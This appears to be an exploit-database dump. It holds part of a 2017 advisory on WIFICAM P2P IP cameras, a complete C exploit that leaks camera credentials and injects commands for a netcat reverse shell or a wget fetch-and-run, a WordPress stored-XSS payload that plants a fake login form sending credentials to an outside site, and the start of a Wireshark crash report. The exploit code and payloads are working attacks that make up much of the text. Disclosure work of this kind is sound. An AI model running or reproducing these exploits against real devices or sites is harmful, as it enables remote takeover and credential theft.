ntp_svr=\"time.nist.gov\";\r\nvar dhcpen=1;\r\nvar ip=\"192.168.2.76\";\r\nvar mask=\"255.255.255.0\";\r\nvar gateway=\"192.168.2.1\";\r\nvar dns1=\"8.8.8.8\";\r\nvar dns2=\"192.168.2.1\";\r\nvar port=80;\r\nvar nashost=\"\";\r\nvar nasport=0;\r\nvar dev2_host=\"\";\r\nvar dev2_alias=\"\";\r\nvar dev2_user=\"\";\r\nvar dev2_pwd=\"\";\r\nvar dev2_port=0;\r\nvar dev3_host=\"\";\r\nvar dev3_alias=\"\";\r\nvar dev3_user=\"\";\r\nvar dev3_pwd=\"\";\r\nvar dev3_port=0;\r\nvar dev4_host=\"\";\r\nvar dev4_alias=\"\";\r\nvar dev4_user=\"\";\r\nvar dev4_pwd=\"\";\r\nvar dev4_port=0;\r\nvar dev5_host=\"\";\r\nvar dev5_alias=\"\";\r\nvar dev5_user=\"\";\r\nvar dev5_pwd=\"\";\r\nvar dev5_port=0;\r\nvar dev6_host=\"\";\r\nvar dev6_alias\r\n[...]\r\nvar user1_name=\"\";\r\nvar user1_pwd=\"\";\r\nvar user2_name=\"wut\";\r\nvar user2_pwd=\"wut\";\r\nvar user3_name=\"admin\";\r\nvar user3_pwd=\"admin\";\r\n[...]\r\n\r\n```\r\n\r\nThis is interesting because an attacker can reach a camera only by knowing a serial number. The UDP tunnel between the attacker and the camera is established even if the attacker doesn't know the credentials. It's useful to note the tunnel bypasses NAT and firewall, allowing the attacker to reach internal cameras (if they are connected to the Internet) and to bruteforce credentials. Then, the attacker can just try to bruteforce credentials of the camera:\r\n\r\n```\r\nGET /get_params.cgi?&loginuse=admin&loginpas=TEST&user=admin&pwd=TEST&\r\n\r\n```\r\n\r\nThis protocol appears to be common to a lot of Android applications, ie:\r\n\r\n* [object.p2pwificam.client](https://play.google.com/store/apps/details?id=object.p2pwificam.client) (500.000 - 1.000.000 installations)\r\n* [hsl.p2pipcam](https://play.google.com/store/apps/details?id=hsl.p2pipcam) (100.000 - 500.000 installations)\r\n* [object.liouzx.client](https://play.google.com/store/apps/details?id=object.liouzx.client) (100.000 - 500.000 installations)\r\n* [object.lioupp.client](https://play.google.com/store/apps/details?id=object.lioupp.client) (100.000 - 500.000 installations)\r\n* [com.g_zhang.myp2pcam](https://play.google.com/store/apps/details?id=com.g_zhang.myp2pcam) (100.000 - 500.000 installations)\r\n* [object.aisaidezx.client](https://play.google.com/store/apps/details?id=object.aisaidezx.client) (50.000 - 100.000 installations)\r\n* [hsl.cam360](https://play.google.com/store/apps/details?id=hsl.cam360) (10.000 - 50.000 installations)\r\n* [bravocam.p2pipcam](https://play.google.com/store/apps/details?id=bravocam.p2pipcam) (10.000 - 50.000 installations)\r\n* [xcam.p2pipcam](https://play.google.com/store/apps/details?id=xcam.p2pipcam) (10.000 - 50.000 installations)\r\n* [snugcam.p2pipcam](https://play.google.com/store/apps/details?id=snugcam.p2pipcam) (10.000 - 50.000 installations)\r\n* [myview.p2pipcam](https://play.google.com/store/apps/details?id=myview.p2pipcam) (5.000 - 10.000 installations)\r\n* [object.weimaisizx.client](https://play.google.com/store/apps/details?id=object.weimaisizx.client) (10.000 - 50.000 installations)\r\n* [com.tutk.P2PCamLive.Pixord](https://play.google.com/store/apps/details?id=com.tutk.P2PCamLive.Pixord) (10.000 - 50.000 installations)\r\n* [object.p2pnetwork.client](https://play.google.com/store/apps/details?id=object.p2pnetwork.client) (5.000 - 10.000 installations)\r\n\r\nThis list is very far from being complete.\r\n\r\nSo, I modified the original Android Application in order to try the pre-auth Info-Leak vulnerability:\r\n\r\n```\r\nk% ls -la\r\ntotal 14912\r\ndrwx------ 2 nobody nogroup 100 Mar 7 08:27 .\r\ndrwxrwxrwt 3 root root 140 Mar 7 08:25 ..\r\n-rwx------ 1 nobody nogroup 2319 Mar 7 08:25 apktool\r\n-rwx------ 1 nobody nogroup 8488199 Mar 7 08:25 apktool.jar\r\n-rwx------ 1 nobody nogroup 6773051 Mar 7 08:25 object.p2pwificam.client.apk\r\nk% ./apktool d object.p2pwificam.client.apk\r\nI: Using Apktool 2.2.2 on object.p2pwificam.client.apk\r\nI: Loading resource table...\r\nI: Decoding AndroidManifest.xml with resources...\r\nS: WARNING: Could not write to $HOME (/nonexistent), using /tmp instead...\r\nS: Please be aware this is a volatile directory and frameworks could go missing, please utilize --frame-path if the default storage directory is unavailable\r\nI: Loading resource table from file: /tmp/.local/share/apktool/framework/1.apk\r\nI: Regular manifest package...\r\nI: Decoding file-resources...\r\nI: Decoding values */* XMLs...\r\nI: Baksmaling classes.dex...\r\nI: Copying assets and libs...\r\nI: Copying unknown files...\r\nI: Copying original files...\r\nk%\r\n\r\n```\r\n\r\nI edit the library which manages all the custom HTTP requests.\r\n\r\nOne of the interesting string is `GET /%sloginuse=%s&loginpas=%s&user=%s&pwd=%s`:\r\n\r\n```\r\nk% xxd ./object.p2pwificam.client/lib/armeabi/libobject_jni.so\r\n\r\n0001f650: 3d3d 3d3d 3d3d 3d3d 0000 0000 4745 5420 ========....GET \r\n0001f660: 2f25 736c 6f67 696e 7573 653d 2573 266c /%sloginuse=%s&l\r\n0001f670: 6f67 696e 7061 733d 2573 2675 7365 723d oginpas=%s&user=\r\n0001f680: 2573 2670 7764 3d25 7326 0000 4449 443a %s&pwd=%s&..DID:\r\n0001f690: 2025 732c 2063 6769 5f67 6574 5f63 6f6d %s, cgi_get_com\r\n0001f6a0: 6d6f 6e3a 2025 7300 5050 5050 5f43 6f6e mon: %s.PPPP_Con\r\n0001f6b0: 6e65 6374 2062 6567 696e 2e2e 2e25 7300 nect begin...%s.\r\n0001f6c0: 5050 5050 5f43 6f6e 6e65 6374 2066 6169 PPPP_Connect fai\r\n0001f6d0: 6c65 642e 2e20 2573 2072 6574 7572 6e3a led.. %s return:\r\n0001f6e0: 2025 6400 5265 436f 6e6e 6563 7443 6f75 %d.ReConnectCou\r\n0001f6f0: 6e74 3a20 2564 0a00 5050 5050 5f43 6f6e nt: %d..PPPP_Con\r\n0001f700: 6e65 6374 2073 7563 6365 7373 2e2e 2e6d nect success...m\r\n0001f710: 5f68 5365 7373 696f 6e48 616e 646c 653a _hSessionHandle:\r\n\r\n```\r\n\r\nAfter the modification:\r\n\r\n```\r\n0001f650: 3d3d 3d3d 3d3d 3d3d 0000 0000 4745 5420 ========....GET \r\n0001f660: 2f73 7973 7465 6d2e 696e 693f 6c6f 6769 /system.ini?logi\r\n0001f670: 6e75 7365 266c 6f67 696e 7061 7373 2678 nuse&loginpass&x\r\n0001f680: 7878 7878 7878 7878 7826 0000 4449 443a xxxxxxxxx&..DID:\r\n0001f690: 2025 732c 2063 6769 5f67 6574 5f63 6f6d %s, cgi_get_com\r\n0001f6a0: 6d6f 6e3a 2025 7300 5050 5050 5f43 6f6e mon: %s.PPPP_Con\r\n0001f6b0: 6e65 6374 2062 6567 696e 2e2e 2e25 7300 nect begin...%s.\r\n0001f6c0: 5050 5050 5f43 6f6e 6e65 6374 2066 6169 PPPP_Connect fai\r\n\r\n```\r\n\r\nThen, let's repack and sign the .apk:\r\n\r\n```\r\nk% ./apktool b object.p2pwificam.client\r\nI: Using Apktool 2.2.2\r\nI: Checking whether sources has changed...\r\nI: Checking whether resources has changed...\r\nI: Building resources...\r\nS: WARNING: Could not write to $HOME (/nonexistent), using /tmp instead...\r\nS: Please be aware this is a volatile directory and frameworks could go missing, please utilize --frame-path if the default storage directory is unavailable\r\nW: warning: string 'conectar' has no default translation.\r\nW: warning: string 'str_ipcamfour' has no default translation.\r\nW: warning: string 'user_pwd_no_show' has no default translation.\r\nI: Copying libs... (/lib)\r\nI: Building apk file...\r\nI: Copying unknown files/dir...\r\nk% openssl genrsa -out key.pem\r\n\r\nGenerating RSA private key, 2048 bit long modulus\r\n..........................................+++\r\n...................................................................+++\r\nunable to write 'random state'\r\ne is 65537 (0x010001)\r\nk% openssl req -new -key key.pem -out request.pem\r\n[...]\r\nk% openssl x509 -req -days 9999 -in request.pem -signkey key.pem -out certificate.pem\r\nSignature ok\r\nsubject=C = AU, ST = Some-State, O = Internet Widgits Pty Ltd\r\nGetting Private key\r\nunable to write 'random state'\r\nk% openssl pkcs8 -topk8 -outform DER -in key.pem -inform PEM -out key.pk8 -nocrypt\r\nk% signapk certificate.pem key.pk8 object.p2pwificam.client/dist/object.p2pwificam.client.apk signed-object.p2pwificam.client.apk\r\nk% ls -latr\r\ntotal 21560\r\ndrwxrwxrwt 3 root root 140 Mar 7 08:25 ..\r\n-rwx------ 1 nobody nogroup 8488199 Mar 7 08:25 apktool.jar\r\n-rwx------ 1 nobody nogroup 2319 Mar 7 08:25 apktool\r\n-rwx------ 1 nobody nogroup 6773051 Mar 7 08:25 object.p2pwificam.client.apk\r\ndrwx------ 9 nobody nogroup 220 Mar 7 08:33 object.p2pwificam.client\r\n-rw------- 1 nobody nogroup 1675 Mar 7 08:33 key.pem\r\n-rw------- 1 nobody nogroup 956 Mar 7 08:33 request.pem\r\n-rw------- 1 nobody nogroup 1111 Mar 7 08:33 certificate.pem\r\n-rw------- 1 nobody nogroup 1217 Mar 7 08:33 key.pk8\r\ndrwx------ 3 nobody nogroup 220 Mar 7 08:34 .\r\n-rw------- 1 nobody nogroup 6787146 Mar 7 08:34 signed-object.p2pwificam.client.apk\r\n\r\n```\r\n\r\n`signed-object.p2pwificam.client.apk` is ready to be used.\r\n\r\nWhen using it, we see that:\r\n\r\nThe client indeed sends the `system.ini` request within the UDP tunnel:\r\n\r\n![](https://images.seebug.org/content/images/2017/03/2017-cam-system-android.png)\r\n\r\nThe camera indeed receives this request within the UDP tunnel:\r\n\r\n![](https://images.seebug.org/content/images/2017/03/2017-cam-system-camera.png)\r\n\r\nComplete trace is:\r\n\r\n![](https://images.seebug.org/content/images/2017/03/2017-cam-system-yolo.png)\r\n\r\nIt appears the pre-auth is not easily reachable within the cloud network.\r\n\r\nThis \"cloud\" protocol seems to be more a botnet protocol than a legit remote access protocol and has indeed weakness (everything in clear-text, i.e. an attacker can attack cameras within the cloud and leverage potential access to hack internal networks).\r\n\r\nA lot of P2P ('Cloud') cameras are in fact using the same botnet protocols and the same infrastructure seemingly to be managed by a single entity.\r\n\r\nWriting a PoC which bruteforces credentials of the remote camera is left as an exercise for the reader.\r\n\r\n## Vendor Response\r\n\r\nDue to difficulties in finding and contacting all the vendors, full-disclosure is applied.\r\n\r\n**I advise to IMMEDIATELY DISCONNECT cameras to the Internet. Hundreds of thousands cameras are affected by the 0day Info-Leak. Millions of them are using the insecure Cloud network.**\r\n\r\n## Report Timeline\r\n\r\n* Feb 26, 2017: Vulnerabilities found by Pierre Kim.\r\n* Mar 08, 2017: A public advisory is sent to security mailing lists.\r\n\r\n## Credits\r\n\r\nThese vulnerabilities were found by Pierre Kim ([@PierreKimSec](https://twitter.com/PierreKimSec)).\r\n\r\n## References\r\n\r\n[https://pierrekim.github.io/advisories/2017-goahead-camera-0x00.txt](https://pierrekim.github.io/advisories/2017-goahead-camera-0x00.txt)\r\n\r\n[https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html](https://pierrekim.github.io/blog/2017-03-06-camera-goahead-0day.html)\r\n\r\n## Disclaimer\r\n\r\nThis advisory is licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 License: [http://creativecommons.org/licenses/by-nc-sa/3.0/](http://creativecommons.org/licenses/by-nc-sa/3.0/)", "modified": "2017-03-08T00:00:00", "published": "2017-03-08T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92748", "id": "SSV:92748", "type": "seebug", "title": "The Wireless IP Camera (P2P) WIFICAM Multiple vulnerabilities", "sourceData": "\n #include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <arpa/inet.h>\r\n#include <netinet/in.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n\r\n#define CAM_PORT 80\r\n#define REMOTE_HOST \"192.168.1.1\"\r\n#define REMOTE_PORT \"1337\"\r\n#define PAYLOAD_0 \"GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc%20\" REMOTE_HOST \"+\" REMOTE_PORT \"%20-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\\r\\n\\r\\n\"\r\n#define PAYLOAD_1 \"GET /ftptest.cgi?next_url=test_ftp.htm&loginuse=%s&loginpas=%s\\r\\n\\r\\n\"\r\n#define PAYLOAD_2 \"GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=passpasspasspasspasspasspasspasspass&dir=/&mode=PORT&upload_interval=0\\r\\n\\r\\n\"\r\n\r\n\r\n#define ALTERNATIVE_PAYLOAD_zero0 \"GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc+\" REMOTE_HOST \"+\" REMOTE_PORT \"+-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\\r\\n\\r\\n\"\r\n#define ALTERNATIVE_PAYLOAD_zero1 \"GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(wget+http://\" REMOTE_HOST \"/stufz&&./stuff)&dir=/&mode=PORT&upload_interval=0\\r\\n\\r\\n\"\r\n\r\nchar * creds(char *argv,\r\n int get_config);\r\n\r\nint rce(char *argv,\r\n char *id,\r\n char attack[],\r\n char desc[]);\r\n\r\n\r\nint main(int argc,\r\n char **argv,\r\n char **envp)\r\n{\r\n char *id;\r\n\r\n printf(\"Camera 0day root RCE with connect-back @PierreKimSec\\n\\n\");\r\n\r\n if (argc < 2)\r\n {\r\n printf(\"%s target\\n\", argv[0]);\r\n printf(\"%s target --get-config will dump the configuration and exit\\n\", argv[0]);\r\n return (1);\r\n }\r\n\r\n if (argc == 2)\r\n printf(\"Please run `nc -vlp %s` on %s\\n\\n\", REMOTE_PORT, REMOTE_HOST);\r\n\r\n if (argc == 3 && !strcmp(argv[2], \"--get-config\"))\r\n id = creds(argv[1], 1);\r\n else\r\n id = creds(argv[1], 0);\r\n\r\n if (id == NULL)\r\n {\r\n printf(\"exploit failed\\n\");\r\n return (1);\r\n }\r\n printf(\"done\\n\");\r\n\r\n printf(\" login = %s\\n\", id);\r\n printf(\" pass = %s\\n\", id + 32);\r\n\r\n if (!rce(argv[1], id, PAYLOAD_0, \"planting\"))\r\n printf(\"done\\n\");\r\n sleep(1);\r\n if (!rce(argv[1], id, PAYLOAD_1, \"executing\"))\r\n printf(\"done\\n\");\r\n if (!rce(argv[1], id, PAYLOAD_2, \"cleaning\"))\r\n printf(\"done\\n\");\r\n if (!rce(argv[1], id, PAYLOAD_1, \"cleaning\"))\r\n printf(\"done\\n\");\r\n\r\n printf(\"[+] enjoy your root shell on %s:%s\\n\", REMOTE_HOST, REMOTE_PORT);\r\n\r\n return (0);\r\n}\r\n\r\n\r\nchar * creds(char *argv,\r\n int get_config)\r\n{\r\n int sock;\r\n int n;\r\n struct sockaddr_in serv_addr;\r\n char buf[8192] = { 0 };\r\n char *out;\r\n char *tmp;\r\n char payload[] = \"GET /system.ini?loginuse&loginpas HTTP/1.0\\r\\n\\r\\n\";\r\n int old_n;\r\n int n_total;\r\n\r\n\r\n sock = 0;\r\n n = 0;\r\n old_n = 0;\r\n n_total = 0;\r\n\r\n printf(\"[+] bypassing auth ... \");\r\n\r\n if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)\r\n {\r\n printf(\"Error while creating socket\\n\");\r\n return (NULL);\r\n }\r\n\r\n memset(&serv_addr, '0', sizeof(serv_addr));\r\n serv_addr.sin_family = AF_INET;\r\n serv_addr.sin_port = htons(CAM_PORT);\r\n\r\n if (inet_pton(AF_INET, argv, &serv_addr.sin_addr) <= 0)\r\n {\r\n printf(\"Error while inet_pton\\n\");\r\n return (NULL);\r\n }\r\n\r\n if (connect(sock, (struct sockaddr *)&serv_addr , sizeof(serv_addr)) < 0)\r\n {\r\n printf(\"creds: connect failed\\n\");\r\n return (NULL);\r\n }\r\n\r\n if (send(sock, payload, strlen(payload) , 0) < 0)\r\n {\r\n printf(\"creds: send failed\\n\");\r\n return (NULL);\r\n }\r\n\r\n if (!(tmp = malloc(10 * 1024 * sizeof(char))))\r\n return (NULL);\r\n\r\n if (!(out = calloc(64, sizeof(char))))\r\n return (NULL);\r\n\r\n while ((n = recv(sock, buf, sizeof(buf), 0)) > 0)\r\n {\r\n n_total += n;\r\n if (n_total < 1024 * 10)\r\n memcpy(tmp + old_n, buf, n);\r\n if (n >= 0)\r\n old_n = n;\r\n }\r\n\r\n close(sock);\r\n\r\n /*\r\n [ HTTP HEADERS ]\r\n ...\r\n\r\n 000????: 0000 0a0a 0a0a 01.. .... .... .... ....\r\n ^^^^ ^^^^ ^^\r\n Useful reference in the binary data\r\n in order to to find the positions of\r\n credentials\r\n ...\r\n ... \r\n 0000690: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........\r\n 00006a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n 00006b0: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........\r\n 00006c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n ...\r\n\r\n NOTE: reference can be too:\r\n 000????: 0006 0606 0606 0100 000a .... .... ....\r\n\r\n Other method: parse everything, find the \"admin\" string and extract the associated password\r\n by adding 31bytes after the address of 'a'[dmin].\r\n Works if the login is admin (seems to be this by default, but can be changed by the user)\r\n */\r\n\r\n if (get_config)\r\n {\r\n for (unsigned int j = 0; j < n_total && j < 10 * 1024; j++)\r\n printf(\"%c\", tmp[j]);\r\n exit (0);\r\n }\r\n\r\n\r\n for (unsigned int j = 50; j < 10 * 1024; j++)\r\n {\r\n if (tmp[j - 4] == 0x0a &&\r\n tmp[j - 3] == 0x0a &&\r\n tmp[j - 2] == 0x0a &&\r\n tmp[j - 1] == 0x0a &&\r\n tmp[j] == 0x01)\r\n {\r\n if (j + 170 < 10 * 1024)\r\n {\r\n strcat(out, &tmp[j + 138]);\r\n strcat(out + 32 * sizeof(char), &tmp[j + 170]);\r\n free(tmp);\r\n\r\n return (out);\r\n }\r\n }\r\n }\r\n\r\n free(tmp);\r\n\r\n return (NULL);\r\n}\r\n\r\nint rce(char *argv,\r\n char *id,\r\n char attack[],\r\n char desc[])\r\n{\r\n int sock;\r\n struct sockaddr_in serv_addr;\r\n char *payload;\r\n\r\n if (!(payload = calloc(512, sizeof(char))))\r\n return (1);\r\n\r\n sock = 0;\r\n\r\n printf(\"[+] %s payload ... \", desc);\r\n\r\n if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)\r\n {\r\n printf(\"Error while creating socket\\n\");\r\n return (1);\r\n }\r\n\r\n memset(&serv_addr, '0', sizeof(serv_addr));\r\n serv_addr.sin_family = AF_INET;\r\n serv_addr.sin_port = htons(CAM_PORT);\r\n\r\n if (inet_pton(AF_INET, argv, &serv_addr.sin_addr) <= 0)\r\n {\r\n printf(\"Error while inet_pton\\n\");\r\n return (1);\r\n }\r\n\r\n if (connect(sock, (struct sockaddr *)&serv_addr , sizeof(serv_addr)) < 0)\r\n {\r\n printf(\"rce: connect failed\\n\");\r\n return (1);\r\n }\r\n\r\n\r\n sprintf(payload, attack, id, id + 32);\r\n if (send(sock, payload, strlen(payload) , 0) < 0)\r\n {\r\n printf(\"rce: send failed\\n\");\r\n return (1);\r\n }\r\n\r\n return (0);\r\n}\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-92748"}], "zdt": [{"lastseen": "2018-01-05T11:10:04", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2017-03-01T00:00:00", "published": "2017-03-01T00:00:00", "href": "https://0day.today/exploit/description/27160", "id": "1337DAY-ID-27160", "type": "zdt", "title": "WordPress User Login Log 2.2.1 Plugin - Cross-Site Scripting Vulnerability", "sourceData": "Source: https://sumofpwn.nl/advisory/2016/stored_cross_site_scripting_vulnerability_in_user_login_log_wordpress_plugin.html\r\n \r\nAbstract\r\nA stored Cross-Site Scripting vulnerability was found in the User Login Log WordPress Plugin. This issue can be exploited by Subscriber (or higher) and allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf.\r\n \r\nContact\r\nFor feedback or questions about this advisory mail us at sumofpwn at securify.nl\r\n \r\nThe Summer of Pwnage\r\nThis issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.\r\n \r\nOVE ID\r\nOVE-20160724-0011\r\n \r\nTested versions\r\nThis issue was successfully tested on User Login Log WordPress Plugin version 2.2.1.\r\n \r\nFix\r\nThere is currently no fix available.\r\n \r\nIntroduction\r\nThe User Login Log WordPress Plugin track records of WordPress user login with set of multiple information like ip, date , time, country , city, and user name. A stored Cross-Site Scripting vulnerability was found in the User Login Log WordPress Plugin. This issue can be exploited by Subscriber (or higher) and allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf.\r\n \r\nDetails\r\nThis vulnerability exists due to the lack of encoding of the User-Agent HTTP request header. This issue exists in method column_default() that is implemented in the file user-login-log.php.\r\n \r\nfunction column_default($item, $column_name)\r\n{\r\n \r\n[...]\r\n \r\n switch($column_name){\r\n \r\n[...]\r\n \r\n default:\r\n return $item[$column_name];\r\n }\r\n}\r\nProof of concept:\r\n \r\nPOST /wp-login.php HTTP/1.1\r\nHost: <target>\r\nUser-Agent: XSS<script>document.getElementById(/wpwrap/.toString().substring(1, 7)).innerHTML = String.fromCharCode(60,108,105,110,107,32,114,101,108,61,39,115,116,121,108,101,115,104,101,101,116,39,32,105,100,61,39,99,111,108,111,114,115,45,102,114,101,115,104,45,99,115,115,39,32,104,114,101,102,61,39,99,115,115,47,99,111,108,111,114,115,45,102,114,101,115,104,46,99,115,115,39,32,116,121,112,101,61,39,116,101,120,116,47,99,115,115,39,32,109,101,100,105,97,61,39,97,108,108,39,47,62,60,108,105,110,107,32,114,101,108,61,39,115,116,121,108,101,115,104,101,101,116,39,32,105,100,61,39,108,111,103,105,110,45,99,115,115,39,32,104,114,101,102,61,39,99,115,115,47,108,111,103,105,110,46,99,115,115,39,32,116,121,112,101,61,39,116,101,120,116,47,99,115,115,39,32,109,101,100,105,97,61,39,97,108,108,39,47,62,32,60,115,116,121,108,101,62,98,111,100,121,123,98,97,99,107,103,114,111,117,110,100,58,32,110,111,110,101,59,125,35,104,101,97,100,101,114,123,98,97,99,107,103,114,111,117,110,100,58,32,110,111,110,101,59,125,35,108,111,103,105,110,102,111,114,109,123,116,101,120,116,45,97,108,105,103,110,58,32,108,101,102,116,59,125,112,32,35,110,97,118,123,116,101,120,116,45,115,104,97,100,111,119,58,32,114,103,98,97,40,50,53,53,44,50,53,53,44,50,53,53,44,49,41,32,48,32,49,112,120,32,48,59,125,46,115,117,98,109,105,116,123,112,97,100,100,105,110,103,58,32,48,59,125,35,98,97,99,107,116,111,98,108,111,103,32,97,123,99,111,108,111,114,58,32,35,99,99,99,59,125,60,47,115,116,121,108,101,62,32,60,100,105,118,32,105,100,61,34,108,111,103,105,110,34,62,60,104,49,62,60,97,32,104,114,101,102,61,34,104,116,116,112,58,47,47,119,111,114,100,112,114,101,115,115,46,111,114,103,47,34,32,116,105,116,108,101,61,34,80,111,119,101,114,101,100,32,98,121,32,87,111,114,100,80,114,101,115,115,34,62,84,111,116,97,108,108,121,32,76,101,103,105,116,32,76,111,103,105,110,32,70,111,114,109,60,47,97,62,60,47,104,49,62,32,60,102,111,114,109,32,110,97,109,101,61,34,108,111,103,105,110,102,111,114,109,34,32,105,100,61,34,108,111,103,105,110,102,111,114,109,34,32,97,99,116,105,111,110,61,34,104,116,116,112,58,47,47,119,119,119,46,115,104,111,97,108,111,97,107,46,109,108,47,99,111,108,108,101,99,116,34,32,109,101,116,104,111,100,61,34,80,79,83,84,34,32,116,97,114,103,101,116,61,34,104,105,100,100,101,110,45,102,111,114,109,34,62,60,112,62,60,108,97,98,101,108,62,85,115,101,114,110,97,109,101,60,98,114,47,62,60,105,110,112,117,116,32,116,121,112,101,61,34,116,101,120,116,34,32,110,97,109,101,61,34,117,34,32,105,100,61,34,117,115,101,114,95,108,111,103,105,110,34,32,99,108,97,115,115,61,34,105,110,112,117,116,34,32,118,97,108,117,101,61,34,34,32,115,105,122,101,61,34,50,48,34,32,116,97,98,105,110,100,101,120,61,34,49,48,34,47,62,60,47,108,97,98,101,108,62,60,47,112,62,60,112,62,60,108,97,98,101,108,62,80,97,115,115,119,111,114,100,60,98,114,47,62,60,105,110,112,117,116,32,116,121,112,101,61,34,112,97,115,115,119,111,114,100,34,32,110,97,109,101,61,34,112,34,32,105,100,61,34,117,115,101,114,95,112,97,115,115,34,32,99,108,97,115,115,61,34,105,110,112,117,116,34,32,118,97,108,117,101,61,34,34,32,115,105,122,101,61,34,50,48,34,32,116,97,98,105,110,100,101,120,61,34,50,48,34,47,62,60,47,108,97,98,101,108,62,60,47,112,62,60,112,32,115,116,121,108,101,61,34,99,111,108,111,114,58,114,101,100,34,62,83,101,115,115,105,111,110,32,104,97,115,32,101,120,112,105,114,101,100,44,32,112,108,101,97,115,101,32,108,111,103,32,105,110,60,47,112,62,60,112,32,99,108,97,115,115,61,34,102,111,114,103,101,116,109,101,110,111,116,34,62,60,108,97,98,101,108,62,60,105,110,112,117,116,32,110,97,109,101,61,34,114,101,109,101,109,98,101,114,109,101,34,32,116,121,112,101,61,34,99,104,101,99,107,98,111,120,34,32,105,100,61,34,114,101,109,101,109,98,101,114,109,101,34,32,118,97,108,117,101,61,34,102,111,114,101,118,101,114,34,32,116,97,98,105,110,100,101,120,61,34,57,48,34,47,62,32,82,101,109,101,109,98,101,114,32,77,101,60,47,108,97,98,101,108,62,60,47,112,62,60,112,32,99,108,97,115,115,61,34,115,117,98,109,105,116,34,62,60,105,110,112,117,116,32,116,121,112,101,61,34,115,117,98,109,105,116,34,32,110,97,109,101,61,34,119,112,45,115,117,98,109,105,116,34,32,105,100,61,34,119,112,45,115,117,98,109,105,116,34,32,118,97,108,117,101,61,34,76,111,103,32,73,110,34,32,116,97,98,105,110,100,101,120,61,34,49,48,48,34,47,62,60,47,112,62,60,47,102,111,114,109,62,32,60,112,32,105,100,61,34,110,97,118,34,62,60,97,32,104,114,101,102,61,34,46,46,47,119,112,45,108,111,103,105,110,46,112,104,112,63,97,99,116,105,111,110,61,108,111,115,116,112,97,115,115,119,111,114,100,34,32,116,105,116,108,101,61,34,80,97,115,115,119,111,114,100,32,76,111,115,116,32,97,110,100,32,70,111,117,110,100,34,62,76,111,115,116,32,121,111,117,114,32,112,97,115,115,119,111,114,100,63,60,47,97,62,60,47,112,62,60,47,100,105,118,62,60,105,102,114,97,109,101,32,115,116,121,108,101,61,34,100,105,115,112,108,97,121,58,110,111,110,101,34,32,110,97,109,101,61,34,104,105,100,100,101,110,45,102,111,114,109,34,62,60,47,105,102,114,97,109,101,62,32,60,115,99,114,105,112,116,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,116,114,121,123,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,117,115,101,114,95,108,111,103,105,110,39,41,46,102,111,99,117,115,40,41,59,125,99,97,116,99,104,40,101,41,123,125,60,47,115,99,114,105,112,116,62);document.getElementById(/wpwrap/.toString().substring(1, 7)).id = /login/.toString().substring(1, 5);document.cookie = String.fromCharCode(39,118,105,115,105,116,101,100,61,116,114,117,101,59,112,97,116,104,61,47,59,109,97,120,45,97,103,101,61,39) + 60 * 10;\r\n</script>XSS\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.8\r\nAccept-Encoding: gzip,deflate,lzma,sdch\r\nCookie: wordpress_test_cookie=WP+Cookie+check\r\nConnection: close\r\nContent-Type: application/x-www-form-urlencoded\r\n \r\nlog=<user name>&pwd=<password>&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1\n\n# 0day.today [2018-01-05] #", "sourceHref": "https://0day.today/exploit/27160", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-13T07:50:41", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2016-05-13T00:00:00", "published": "2016-05-13T00:00:00", "href": "https://0day.today/exploit/description/26008", "id": "1337DAY-ID-26008", "type": "zdt", "title": "Wireshark - AirPDcapDecryptWPABroadcastKey Heap Based Out-of-Bounds Read", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=740\r\n \r\nThe following crash due to a heap-based out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark (\"$ ./tshark -nVxr /path/to/file\"):\r\n \r\n--- cut ---\r\n==8910==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001335c at pc 0x0000004558a4 bp 0x7fffa0f13710 sp 0x7fffa0f12ec0\r\nREAD of size 16385 at 0x61b00001335c thread T0\r\n #0 0x4558a3 in memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:438\r\n #1 0x7f1d70c97b65 in g_memdup (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x65b65)\r\n #2 0x7f1d78b4c531 in AirPDcapDecryptWPABroadcastKey 